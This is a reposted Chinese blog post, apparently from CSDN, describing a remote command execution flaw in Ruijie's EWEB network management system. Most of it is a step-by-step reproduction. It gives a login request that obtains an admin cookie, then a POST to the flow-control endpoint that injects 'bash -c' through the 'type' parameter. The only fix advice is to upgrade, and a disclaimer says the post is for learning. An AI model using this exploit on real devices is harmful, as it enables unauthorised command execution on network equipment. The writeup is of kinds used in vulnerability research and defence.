0


锐捷EWEB网管系统RCE漏洞

文章目录

免责声明

该文章只为学习和交流,请不要做违法乱纪的事情,如有与本人无关

漏洞描述

锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

漏洞原理

在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数

影响版本

不详

漏洞复现

在这里插入图片描述
用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie

POST /ddi/server/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length:30Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=admin&password=admin?

在这里插入图片描述
使用cookie向/flow_control_pi/flwo.control.php?a=getFlowGroup 提交type参数

POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length:45Content-Type: application/x-www-form-urlencoded
Cookie:  RUIJIEID=q6g97tqc32rl4bl8h89gjub031; user=admin;
Accept-Encoding: gzip
Connection: close

type=|bash+-c+'ping+-c+4+ip'

在这里插入图片描述

修复建议

升级到最新版本

标签: 漏洞

本文转载自: https://blog.csdn.net/weixin_70137901/article/details/138702387
版权归原作者 抠脚大汉在网络 所有, 如有侵权,请联系我们删除。

“锐捷EWEB网管系统RCE漏洞”的评论:

还没有评论